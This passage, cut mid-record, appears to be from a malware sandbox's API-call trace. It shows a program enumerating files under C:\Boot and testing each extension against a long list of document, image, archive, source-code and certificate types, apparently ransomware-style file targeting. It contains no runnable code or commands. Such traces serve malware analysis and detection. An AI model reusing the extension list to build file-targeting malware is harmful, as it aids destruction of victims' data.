(lpString=".odc") returned 4 [0285.811] lstrcmpiW (lpString1=".odc", lpString2=".mui") returned 1 [0285.811] lstrlenW (lpString=".odm") returned 4 [0285.811] lstrcmpiW (lpString1=".odm", lpString2=".mui") returned 1 [0285.811] lstrlenW (lpString=".odp") returned 4 [0285.811] lstrcmpiW (lpString1=".odp", lpString2=".mui") returned 1 [0285.811] lstrlenW (lpString=".ods") returned 4 [0285.811] lstrcmpiW (lpString1=".ods", lpString2=".mui") returned 1 [0285.811] lstrlenW (lpString=".oft") returned 4 [0285.812] lstrcmpiW (lpString1=".oft", lpString2=".mui") returned 1 [0285.812] lstrlenW (lpString=".one") returned 4 [0285.812] lstrcmpiW (lpString1=".one", lpString2=".mui") returned 1 [0285.812] lstrlenW (lpString=".onepkg") returned 7 [0285.812] lstrcmpiW (lpString1=".onepkg", lpString2="exe.mui") returned -1 [0285.812] lstrlenW (lpString=".onetoc2") returned 8 [0285.812] lstrcmpiW (lpString1=".onetoc2", lpString2=".exe.mui") returned 1 [0285.812] lstrlenW (lpString=".opt") returned 4 [0285.815] lstrcmpiW (lpString1=".opt", lpString2=".mui") returned 1 [0285.815] lstrlenW (lpString=".oqy") returned 4 [0285.815] lstrcmpiW (lpString1=".oqy", lpString2=".mui") returned 1 [0285.815] lstrlenW (lpString=".orf") returned 4 [0285.815] lstrcmpiW (lpString1=".orf", lpString2=".mui") returned 1 [0285.815] lstrlenW (lpString=".p12") returned 4 [0285.815] lstrcmpiW (lpString1=".p12", lpString2=".mui") returned 1 [0285.815] lstrlenW (lpString=".p7b") returned 4 [0285.815] lstrcmpiW (lpString1=".p7b", lpString2=".mui") returned 1 [0285.815] lstrlenW (lpString=".p7c") returned 4 [0285.815] lstrcmpiW (lpString1=".p7c", lpString2=".mui") returned 1 [0285.815] lstrlenW (lpString=".pam") returned 4 [0285.815] lstrcmpiW (lpString1=".pam", lpString2=".mui") returned 1 [0285.815] lstrlenW (lpString=".pbm") returned 4 [0285.815] lstrcmpiW (lpString1=".pbm", lpString2=".mui") returned 1 [0285.815] lstrlenW (lpString=".pct") returned 4 [0285.815] lstrcmpiW (lpString1=".pct", lpString2=".mui") returned 1 [0285.815] lstrlenW (lpString=".pcx") returned 4 [0285.815] lstrcmpiW (lpString1=".pcx", lpString2=".mui") returned 1 [0285.815] lstrlenW (lpString=".pdd") returned 4 [0285.815] lstrcmpiW (lpString1=".pdd", lpString2=".mui") returned 1 [0285.815] lstrlenW (lpString=".pdf") returned 4 [0285.815] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0285.816] lstrlenW (lpString=".pdp") returned 4 [0285.816] lstrcmpiW (lpString1=".pdp", lpString2=".mui") returned 1 [0285.816] lstrlenW (lpString=".pef") returned 4 [0285.816] lstrcmpiW (lpString1=".pef", lpString2=".mui") returned 1 [0285.816] lstrlenW (lpString=".pem") returned 4 [0285.816] lstrcmpiW (lpString1=".pem", lpString2=".mui") returned 1 [0285.816] lstrlenW (lpString=".pff") returned 4 [0285.816] lstrcmpiW (lpString1=".pff", lpString2=".mui") returned 1 [0285.816] lstrlenW (lpString=".pfm") returned 4 [0285.816] lstrcmpiW (lpString1=".pfm", lpString2=".mui") returned 1 [0285.816] lstrlenW (lpString=".pfx") returned 4 [0285.816] lstrcmpiW (lpString1=".pfx", lpString2=".mui") returned 1 [0285.816] lstrlenW (lpString=".pgm") returned 4 [0285.816] lstrcmpiW (lpString1=".pgm", lpString2=".mui") returned 1 [0285.816] lstrlenW (lpString=".php") returned 4 [0285.816] lstrcmpiW (lpString1=".php", lpString2=".mui") returned 1 [0285.816] lstrlenW (lpString=".php3") returned 5 [0285.816] lstrcmpiW (lpString1=".php3", lpString2="e.mui") returned -1 [0285.816] lstrlenW (lpString=".php4") returned 5 [0285.816] lstrcmpiW (lpString1=".php4", lpString2="e.mui") returned -1 [0285.816] lstrlenW (lpString=".php5") returned 5 [0285.816] lstrcmpiW (lpString1=".php5", lpString2="e.mui") returned -1 [0285.816] lstrlenW (lpString=".phtml") returned 6 [0285.816] lstrcmpiW (lpString1=".phtml", lpString2="xe.mui") returned -1 [0285.816] lstrlenW (lpString=".pict") returned 5 [0285.816] lstrcmpiW (lpString1=".pict", lpString2="e.mui") returned -1 [0285.817] lstrlenW (lpString=".pl") returned 3 [0285.817] lstrcmpiW (lpString1=".pl", lpString2="mui") returned -1 [0285.817] lstrlenW (lpString=".pls") returned 4 [0285.817] lstrcmpiW (lpString1=".pls", lpString2=".mui") returned 1 [0285.817] lstrlenW (lpString=".pm") returned 3 [0285.817] lstrcmpiW (lpString1=".pm", lpString2="mui") returned -1 [0285.817] lstrlenW (lpString=".png") returned 4 [0285.817] lstrcmpiW (lpString1=".png", lpString2=".mui") returned 1 [0285.817] lstrlenW (lpString=".pnm") returned 4 [0285.817] lstrcmpiW (lpString1=".pnm", lpString2=".mui") returned 1 [0285.817] lstrlenW (lpString=".pot") returned 4 [0285.817] lstrcmpiW (lpString1=".pot", lpString2=".mui") returned 1 [0285.817] lstrlenW (lpString=".potm") returned 5 [0285.817] lstrcmpiW (lpString1=".potm", lpString2="e.mui") returned -1 [0285.817] lstrlenW (lpString=".potx") returned 5 [0285.817] lstrcmpiW (lpString1=".potx", lpString2="e.mui") returned -1 [0285.817] lstrlenW (lpString=".ppa") returned 4 [0285.817] lstrcmpiW (lpString1=".ppa", lpString2=".mui") returned 1 [0285.817] lstrlenW (lpString=".ppam") returned 5 [0285.817] lstrcmpiW (lpString1=".ppam", lpString2="e.mui") returned -1 [0285.817] lstrlenW (lpString=".ppm") returned 4 [0285.817] lstrcmpiW (lpString1=".ppm", lpString2=".mui") returned 1 [0285.817] lstrlenW (lpString=".pps") returned 4 [0285.817] lstrcmpiW (lpString1=".pps", lpString2=".mui") returned 1 [0285.818] lstrlenW (lpString=".ppsm") returned 5 [0285.818] lstrcmpiW (lpString1=".ppsm", lpString2="e.mui") returned -1 [0285.818] lstrlenW (lpString=".ppt") returned 4 [0285.818] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0285.818] lstrlenW (lpString=".pptm") returned 5 [0285.818] lstrcmpiW (lpString1=".pptm", lpString2="e.mui") returned -1 [0285.818] lstrlenW (lpString=".pptx") returned 5 [0285.818] lstrcmpiW (lpString1=".pptx", lpString2="e.mui") returned -1 [0285.818] lstrlenW (lpString=".prn") returned 4 [0285.818] lstrcmpiW (lpString1=".prn", lpString2=".mui") returned 1 [0285.818] lstrlenW (lpString=".ps") returned 3 [0285.818] lstrcmpiW (lpString1=".ps", lpString2="mui") returned -1 [0285.818] lstrlenW (lpString=".psb") returned 4 [0285.818] lstrcmpiW (lpString1=".psb", lpString2=".mui") returned 1 [0285.818] lstrlenW (lpString=".psd") returned 4 [0285.818] lstrcmpiW (lpString1=".psd", lpString2=".mui") returned 1 [0285.818] lstrlenW (lpString=".pst") returned 4 [0285.818] lstrcmpiW (lpString1=".pst", lpString2=".mui") returned 1 [0285.818] lstrlenW (lpString=".ptx") returned 4 [0285.818] lstrcmpiW (lpString1=".ptx", lpString2=".mui") returned 1 [0285.818] lstrlenW (lpString=".pub") returned 4 [0285.818] lstrcmpiW (lpString1=".pub", lpString2=".mui") returned 1 [0285.818] lstrlenW (lpString=".pwm") returned 4 [0285.818] lstrcmpiW (lpString1=".pwm", lpString2=".mui") returned 1 [0285.818] lstrlenW (lpString=".pxr") returned 4 [0285.819] lstrcmpiW (lpString1=".pxr", lpString2=".mui") returned 1 [0285.819] lstrlenW (lpString=".py") returned 3 [0285.819] lstrcmpiW (lpString1=".py", lpString2="mui") returned -1 [0285.819] lstrlenW (lpString=".qt") returned 3 [0285.819] lstrcmpiW (lpString1=".qt", lpString2="mui") returned -1 [0285.819] lstrlenW (lpString=".r3d") returned 4 [0285.819] lstrcmpiW (lpString1=".r3d", lpString2=".mui") returned 1 [0285.819] lstrlenW (lpString=".raf") returned 4 [0285.819] lstrcmpiW (lpString1=".raf", lpString2=".mui") returned 1 [0285.819] lstrlenW (lpString=".rar") returned 4 [0285.819] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0285.819] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13560, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0285.819] FindClose (in: hFindFile=0x3947ea8 | out: hFindFile=0x3947ea8) returned 1 [0285.820] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0285.820] FindNextFileW (in: hFindFile=0x3947e28, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010bc12, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ade2b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0285.820] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0285.820] lstrlenW (lpString="C:\\Boot\\fr-FR") returned 13 [0285.820] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010bc12, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ade2b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947fe8 [0285.820] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010bc12, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ade2b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0285.820] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2096e751, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13558, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0285.820] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0285.820] lstrlenW (lpString=".1cd") returned 4 [0285.820] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0285.820] lstrlenW (lpString=".3ds") returned 4 [0285.820] lstrcmpiW (lpString1=".3ds", lpString2=".mui") returned -1 [0285.820] lstrlenW (lpString=".3fr") returned 4 [0285.820] lstrcmpiW (lpString1=".3fr", lpString2=".mui") returned -1 [0285.821] lstrlenW (lpString=".3g2") returned 4 [0285.821] lstrcmpiW (lpString1=".3g2", lpString2=".mui") returned -1 [0285.821] lstrlenW (lpString=".3gp") returned 4 [0285.821] lstrcmpiW (lpString1=".3gp", lpString2=".mui") returned -1 [0285.821] lstrlenW (lpString=".7z") returned 3 [0285.821] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0285.821] lstrlenW (lpString=".accda") returned 6 [0285.821] lstrcmpiW (lpString1=".accda", lpString2="xe.mui") returned -1 [0285.821] lstrlenW (lpString=".accdb") returned 6 [0285.821] lstrcmpiW (lpString1=".accdb", lpString2="xe.mui") returned -1 [0285.821] lstrlenW (lpString=".accdc") returned 6 [0285.821] lstrcmpiW (lpString1=".accdc", lpString2="xe.mui") returned -1 [0285.821] lstrlenW (lpString=".accde") returned 6 [0285.821] lstrcmpiW (lpString1=".accde", lpString2="xe.mui") returned -1 [0285.821] lstrlenW (lpString=".accdt") returned 6 [0285.821] lstrcmpiW (lpString1=".accdt", lpString2="xe.mui") returned -1 [0285.821] lstrlenW (lpString=".accdw") returned 6 [0285.821] lstrcmpiW (lpString1=".accdw", lpString2="xe.mui") returned -1 [0285.821] lstrlenW (lpString=".adb") returned 4 [0285.821] lstrcmpiW (lpString1=".adb", lpString2=".mui") returned -1 [0285.821] lstrlenW (lpString=".adp") returned 4 [0285.821] lstrcmpiW (lpString1=".adp", lpString2=".mui") returned -1 [0285.821] lstrlenW (lpString=".ai") returned 3 [0285.821] lstrcmpiW (lpString1=".ai", lpString2="mui") returned -1 [0285.821] lstrlenW (lpString=".ai3") returned 4 [0285.822] lstrcmpiW (lpString1=".ai3", lpString2=".mui") returned -1 [0285.822] lstrlenW (lpString=".ai4") returned 4 [0285.822] lstrcmpiW (lpString1=".ai4", lpString2=".mui") returned -1 [0285.822] lstrlenW (lpString=".ai5") returned 4 [0285.822] lstrcmpiW (lpString1=".ai5", lpString2=".mui") returned -1 [0285.822] lstrlenW (lpString=".ai6") returned 4 [0285.822] lstrcmpiW (lpString1=".ai6", lpString2=".mui") returned -1 [0285.822] lstrlenW (lpString=".ai7") returned 4 [0285.822] lstrcmpiW (lpString1=".ai7", lpString2=".mui") returned -1 [0285.822] lstrlenW (lpString=".ai8") returned 4 [0285.822] lstrcmpiW (lpString1=".ai8", lpString2=".mui") returned -1 [0285.822] lstrlenW (lpString=".anim") returned 5 [0285.822] lstrcmpiW (lpString1=".anim", lpString2="e.mui") returned -1 [0285.822] lstrlenW (lpString=".arw") returned 4 [0285.822] lstrcmpiW (lpString1=".arw", lpString2=".mui") returned -1 [0285.822] lstrlenW (lpString=".as") returned 3 [0285.822] lstrcmpiW (lpString1=".as", lpString2="mui") returned -1 [0285.822] lstrlenW (lpString=".asa") returned 4 [0285.822] lstrcmpiW (lpString1=".asa", lpString2=".mui") returned -1 [0285.822] lstrlenW (lpString=".asc") returned 4 [0285.822] lstrcmpiW (lpString1=".asc", lpString2=".mui") returned -1 [0285.822] lstrlenW (lpString=".ascx") returned 5 [0285.822] lstrcmpiW (lpString1=".ascx", lpString2="e.mui") returned -1 [0285.822] lstrlenW (lpString=".asm") returned 4 [0285.822] lstrcmpiW (lpString1=".asm", lpString2=".mui") returned -1 [0285.822] lstrlenW (lpString=".asmx") returned 5 [0285.825] lstrcmpiW (lpString1=".asmx", lpString2="e.mui") returned -1 [0285.825] lstrlenW (lpString=".asp") returned 4 [0285.825] lstrcmpiW (lpString1=".asp", lpString2=".mui") returned -1 [0285.825] lstrlenW (lpString=".aspx") returned 5 [0285.825] lstrcmpiW (lpString1=".aspx", lpString2="e.mui") returned -1 [0285.825] lstrlenW (lpString=".asr") returned 4 [0285.825] lstrcmpiW (lpString1=".asr", lpString2=".mui") returned -1 [0285.825] lstrlenW (lpString=".asx") returned 4 [0285.825] lstrcmpiW (lpString1=".asx", lpString2=".mui") returned -1 [0285.825] lstrlenW (lpString=".avi") returned 4 [0285.826] lstrcmpiW (lpString1=".avi", lpString2=".mui") returned -1 [0285.826] lstrlenW (lpString=".avs") returned 4 [0285.826] lstrcmpiW (lpString1=".avs", lpString2=".mui") returned -1 [0285.826] lstrlenW (lpString=".backup") returned 7 [0285.826] lstrcmpiW (lpString1=".backup", lpString2="exe.mui") returned -1 [0285.826] lstrlenW (lpString=".bak") returned 4 [0285.826] lstrcmpiW (lpString1=".bak", lpString2=".mui") returned -1 [0285.826] lstrlenW (lpString=".bay") returned 4 [0285.826] lstrcmpiW (lpString1=".bay", lpString2=".mui") returned -1 [0285.826] lstrlenW (lpString=".bd") returned 3 [0285.826] lstrcmpiW (lpString1=".bd", lpString2="mui") returned -1 [0285.826] lstrlenW (lpString=".bin") returned 4 [0285.826] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0285.826] lstrlenW (lpString=".bmp") returned 4 [0285.826] lstrcmpiW (lpString1=".bmp", lpString2=".mui") returned -1 [0285.826] lstrlenW (lpString=".bz2") returned 4 [0285.826] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0285.826] lstrlenW (lpString=".c") returned 2 [0285.826] lstrcmpiW (lpString1=".c", lpString2="ui") returned -1 [0285.826] lstrlenW (lpString=".cdr") returned 4 [0285.826] lstrcmpiW (lpString1=".cdr", lpString2=".mui") returned -1 [0285.826] lstrlenW (lpString=".cer") returned 4 [0285.826] lstrcmpiW (lpString1=".cer", lpString2=".mui") returned -1 [0285.826] lstrlenW (lpString=".cf") returned 3 [0285.826] lstrcmpiW (lpString1=".cf", lpString2="mui") returned -1 [0285.826] lstrlenW (lpString=".cfc") returned 4 [0285.826] lstrcmpiW (lpString1=".cfc", lpString2=".mui") returned -1 [0285.827] lstrlenW (lpString=".cfm") returned 4 [0285.827] lstrcmpiW (lpString1=".cfm", lpString2=".mui") returned -1 [0285.827] lstrlenW (lpString=".cfml") returned 5 [0285.827] lstrcmpiW (lpString1=".cfml", lpString2="e.mui") returned -1 [0285.827] lstrlenW (lpString=".cfu") returned 4 [0285.827] lstrcmpiW (lpString1=".cfu", lpString2=".mui") returned -1 [0285.827] lstrlenW (lpString=".chm") returned 4 [0285.827] lstrcmpiW (lpString1=".chm", lpString2=".mui") returned -1 [0285.827] lstrlenW (lpString=".cin") returned 4 [0285.827] lstrcmpiW (lpString1=".cin", lpString2=".mui") returned -1 [0285.827] lstrlenW (lpString=".class") returned 6 [0285.827] lstrcmpiW (lpString1=".class", lpString2="xe.mui") returned -1 [0285.827] lstrlenW (lpString=".clx") returned 4 [0285.827] lstrcmpiW (lpString1=".clx", lpString2=".mui") returned -1 [0285.827] lstrlenW (lpString=".config") returned 7 [0285.827] lstrcmpiW (lpString1=".config", lpString2="exe.mui") returned -1 [0285.827] lstrlenW (lpString=".cpp") returned 4 [0285.827] lstrcmpiW (lpString1=".cpp", lpString2=".mui") returned -1 [0285.827] lstrlenW (lpString=".cr2") returned 4 [0285.827] lstrcmpiW (lpString1=".cr2", lpString2=".mui") returned -1 [0285.827] lstrlenW (lpString=".crt") returned 4 [0285.827] lstrcmpiW (lpString1=".crt", lpString2=".mui") returned -1 [0285.827] lstrlenW (lpString=".crw") returned 4 [0285.827] lstrcmpiW (lpString1=".crw", lpString2=".mui") returned -1 [0285.828] lstrlenW (lpString=".cs") returned 3 [0285.828] lstrcmpiW (lpString1=".cs", lpString2="mui") returned -1 [0285.828] lstrlenW (lpString=".css") returned 4 [0285.828] lstrcmpiW (lpString1=".css", lpString2=".mui") returned -1 [0285.828] lstrlenW (lpString=".csv") returned 4 [0285.828] lstrcmpiW (lpString1=".csv", lpString2=".mui") returned -1 [0285.828] lstrlenW (lpString=".cub") returned 4 [0285.828] lstrcmpiW (lpString1=".cub", lpString2=".mui") returned -1 [0285.828] lstrlenW (lpString=".dae") returned 4 [0285.828] lstrcmpiW (lpString1=".dae", lpString2=".mui") returned -1 [0285.828] lstrlenW (lpString=".dat") returned 4 [0285.828] lstrcmpiW (lpString1=".dat", lpString2=".mui") returned -1 [0285.828] lstrlenW (lpString=".db") returned 3 [0285.828] lstrcmpiW (lpString1=".db", lpString2="mui") returned -1 [0285.828] lstrlenW (lpString=".dbf") returned 4 [0285.828] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0285.828] lstrlenW (lpString=".dbx") returned 4 [0285.828] lstrcmpiW (lpString1=".dbx", lpString2=".mui") returned -1 [0285.828] lstrlenW (lpString=".dc3") returned 4 [0285.828] lstrcmpiW (lpString1=".dc3", lpString2=".mui") returned -1 [0285.828] lstrlenW (lpString=".dcm") returned 4 [0285.828] lstrcmpiW (lpString1=".dcm", lpString2=".mui") returned -1 [0285.828] lstrlenW (lpString=".dcr") returned 4 [0285.828] lstrcmpiW (lpString1=".dcr", lpString2=".mui") returned -1 [0285.828] lstrlenW (lpString=".der") returned 4 [0285.829] lstrcmpiW (lpString1=".der", lpString2=".mui") returned -1 [0285.829] lstrlenW (lpString=".dib") returned 4 [0285.829] lstrcmpiW (lpString1=".dib", lpString2=".mui") returned -1 [0285.829] lstrlenW (lpString=".dic") returned 4 [0285.829] lstrcmpiW (lpString1=".dic", lpString2=".mui") returned -1 [0285.829] lstrlenW (lpString=".dif") returned 4 [0285.829] lstrcmpiW (lpString1=".dif", lpString2=".mui") returned -1 [0285.829] lstrlenW (lpString=".divx") returned 5 [0285.829] lstrcmpiW (lpString1=".divx", lpString2="e.mui") returned -1 [0285.829] lstrlenW (lpString=".djvu") returned 5 [0285.829] lstrcmpiW (lpString1=".djvu", lpString2="e.mui") returned -1 [0285.829] lstrlenW (lpString=".dng") returned 4 [0285.829] lstrcmpiW (lpString1=".dng", lpString2=".mui") returned -1 [0285.829] lstrlenW (lpString=".doc") returned 4 [0285.829] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0285.829] lstrlenW (lpString=".docm") returned 5 [0285.829] lstrcmpiW (lpString1=".docm", lpString2="e.mui") returned -1 [0285.829] lstrlenW (lpString=".docx") returned 5 [0285.829] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0285.829] lstrlenW (lpString=".dot") returned 4 [0285.829] lstrcmpiW (lpString1=".dot", lpString2=".mui") returned -1 [0285.829] lstrlenW (lpString=".dotm") returned 5 [0285.829] lstrcmpiW (lpString1=".dotm", lpString2="e.mui") returned -1 [0285.829] lstrlenW (lpString=".dotx") returned 5 [0285.829] lstrcmpiW (lpString1=".dotx", lpString2="e.mui") returned -1 [0285.829] lstrlenW (lpString=".dpx") returned 4 [0285.829] lstrcmpiW (lpString1=".dpx", lpString2=".mui") returned -1 [0285.829] lstrlenW (lpString=".dqy") returned 4 [0285.830] lstrcmpiW (lpString1=".dqy", lpString2=".mui") returned -1 [0285.830] lstrlenW (lpString=".dsn") returned 4 [0285.830] lstrcmpiW (lpString1=".dsn", lpString2=".mui") returned -1 [0285.830] lstrlenW (lpString=".dt") returned 3 [0285.830] lstrcmpiW (lpString1=".dt", lpString2="mui") returned -1 [0285.830] lstrlenW (lpString=".dtd") returned 4 [0285.830] lstrcmpiW (lpString1=".dtd", lpString2=".mui") returned -1 [0285.830] lstrlenW (lpString=".dwg") returned 4 [0285.830] lstrcmpiW (lpString1=".dwg", lpString2=".mui") returned -1 [0285.830] lstrlenW (lpString=".dwt") returned 4 [0285.830] lstrcmpiW (lpString1=".dwt", lpString2=".mui") returned -1 [0285.830] lstrlenW (lpString=".dx") returned 3 [0285.830] lstrcmpiW (lpString1=".dx", lpString2="mui") returned -1 [0285.830] lstrlenW (lpString=".dxf") returned 4 [0285.830] lstrcmpiW (lpString1=".dxf", lpString2=".mui") returned -1 [0285.830] lstrlenW (lpString=".edml") returned 5 [0285.830] lstrcmpiW (lpString1=".edml", lpString2="e.mui") returned -1 [0285.830] lstrlenW (lpString=".efd") returned 4 [0285.830] lstrcmpiW (lpString1=".efd", lpString2=".mui") returned -1 [0285.830] lstrlenW (lpString=".elf") returned 4 [0285.830] lstrcmpiW (lpString1=".elf", lpString2=".mui") returned -1 [0285.830] lstrlenW (lpString=".emf") returned 4 [0285.830] lstrcmpiW (lpString1=".emf", lpString2=".mui") returned -1 [0285.830] lstrlenW (lpString=".emz") returned 4 [0285.830] lstrcmpiW (lpString1=".emz", lpString2=".mui") returned -1 [0285.830] lstrlenW (lpString=".epf") returned 4 [0285.830] lstrcmpiW (lpString1=".epf", lpString2=".mui") returned -1 [0285.830] lstrlenW (lpString=".eps") returned 4 [0285.831] lstrcmpiW (lpString1=".eps", lpString2=".mui") returned -1 [0285.831] lstrlenW (lpString=".epsf") returned 5 [0285.831] lstrcmpiW (lpString1=".epsf", lpString2="e.mui") returned -1 [0285.831] lstrlenW (lpString=".epsp") returned 5 [0285.831] lstrcmpiW (lpString1=".epsp", lpString2="e.mui") returned -1 [0285.831] lstrlenW (lpString=".erf") returned 4 [0285.831] lstrcmpiW (lpString1=".erf", lpString2=".mui") returned -1 [0285.831] lstrlenW (lpString=".exr") returned 4 [0285.831] lstrcmpiW (lpString1=".exr", lpString2=".mui") returned -1 [0285.831] lstrlenW (lpString=".f4v") returned 4 [0285.831] lstrcmpiW (lpString1=".f4v", lpString2=".mui") returned -1 [0285.831] lstrlenW (lpString=".fido") returned 5 [0285.831] lstrcmpiW (lpString1=".fido", lpString2="e.mui") returned -1 [0285.831] lstrlenW (lpString=".flm") returned 4 [0285.831] lstrcmpiW (lpString1=".flm", lpString2=".mui") returned -1 [0285.831] lstrlenW (lpString=".flv") returned 4 [0285.831] lstrcmpiW (lpString1=".flv", lpString2=".mui") returned -1 [0285.831] lstrlenW (lpString=".frm") returned 4 [0285.831] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0285.831] lstrlenW (lpString=".fxg") returned 4 [0285.831] lstrcmpiW (lpString1=".fxg", lpString2=".mui") returned -1 [0285.831] lstrlenW (lpString=".geo") returned 4 [0285.831] lstrcmpiW (lpString1=".geo", lpString2=".mui") returned -1 [0285.831] lstrlenW (lpString=".gif") returned 4 [0285.831] lstrcmpiW (lpString1=".gif", lpString2=".mui") returned -1 [0285.831] lstrlenW (lpString=".grs") returned 4 [0285.831] lstrcmpiW (lpString1=".grs", lpString2=".mui") returned -1 [0285.831] lstrlenW (lpString=".gz") returned 3 [0285.832] lstrcmpiW (lpString1=".gz", lpString2="mui") returned -1 [0285.832] lstrlenW (lpString=".h") returned 2 [0285.832] lstrcmpiW (lpString1=".h", lpString2="ui") returned -1 [0285.832] lstrlenW (lpString=".hdr") returned 4 [0285.832] lstrcmpiW (lpString1=".hdr", lpString2=".mui") returned -1 [0285.832] lstrlenW (lpString=".hpp") returned 4 [0285.832] lstrcmpiW (lpString1=".hpp", lpString2=".mui") returned -1 [0285.832] lstrlenW (lpString=".hta") returned 4 [0285.832] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0285.832] lstrlenW (lpString=".htc") returned 4 [0285.832] lstrcmpiW (lpString1=".htc", lpString2=".mui") returned -1 [0285.832] lstrlenW (lpString=".htm") returned 4 [0285.832] lstrcmpiW (lpString1=".htm", lpString2=".mui") returned -1 [0285.832] lstrlenW (lpString=".html") returned 5 [0285.832] lstrcmpiW (lpString1=".html", lpString2="e.mui") returned -1 [0285.832] lstrlenW (lpString=".icb") returned 4 [0285.832] lstrcmpiW (lpString1=".icb", lpString2=".mui") returned -1 [0285.832] lstrlenW (lpString=".ics") returned 4 [0285.832] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0285.832] lstrlenW (lpString=".iff") returned 4 [0285.832] lstrcmpiW (lpString1=".iff", lpString2=".mui") returned -1 [0285.832] lstrlenW (lpString=".inc") returned 4 [0285.832] lstrcmpiW (lpString1=".inc", lpString2=".mui") returned -1 [0285.832] lstrlenW (lpString=".indd") returned 5 [0285.832] lstrcmpiW (lpString1=".indd", lpString2="e.mui") returned -1 [0285.832] lstrlenW (lpString=".ini") returned 4 [0285.832] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0285.833] lstrlenW (lpString=".iqy") returned 4 [0285.833] lstrcmpiW (lpString1=".iqy", lpString2=".mui") returned -1 [0285.833] lstrlenW (lpString=".j2c") returned 4 [0285.833] lstrcmpiW (lpString1=".j2c", lpString2=".mui") returned -1 [0285.833] lstrlenW (lpString=".j2k") returned 4 [0285.833] lstrcmpiW (lpString1=".j2k", lpString2=".mui") returned -1 [0285.833] lstrlenW (lpString=".java") returned 5 [0285.833] lstrcmpiW (lpString1=".java", lpString2="e.mui") returned -1 [0285.833] lstrlenW (lpString=".jp2") returned 4 [0285.833] lstrcmpiW (lpString1=".jp2", lpString2=".mui") returned -1 [0285.833] lstrlenW (lpString=".jpc") returned 4 [0285.833] lstrcmpiW (lpString1=".jpc", lpString2=".mui") returned -1 [0285.833] lstrlenW (lpString=".jpe") returned 4 [0285.833] lstrcmpiW (lpString1=".jpe", lpString2=".mui") returned -1 [0285.833] lstrlenW (lpString=".jpeg") returned 5 [0285.833] lstrcmpiW (lpString1=".jpeg", lpString2="e.mui") returned -1 [0285.833] lstrlenW (lpString=".jpf") returned 4 [0285.833] lstrcmpiW (lpString1=".jpf", lpString2=".mui") returned -1 [0285.833] lstrlenW (lpString=".jpg") returned 4 [0285.833] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0285.833] lstrlenW (lpString=".jpx") returned 4 [0285.833] lstrcmpiW (lpString1=".jpx", lpString2=".mui") returned -1 [0285.833] lstrlenW (lpString=".js") returned 3 [0285.833] lstrcmpiW (lpString1=".js", lpString2="mui") returned -1 [0285.833] lstrlenW (lpString=".jsf") returned 4 [0285.833] lstrcmpiW (lpString1=".jsf", lpString2=".mui") returned 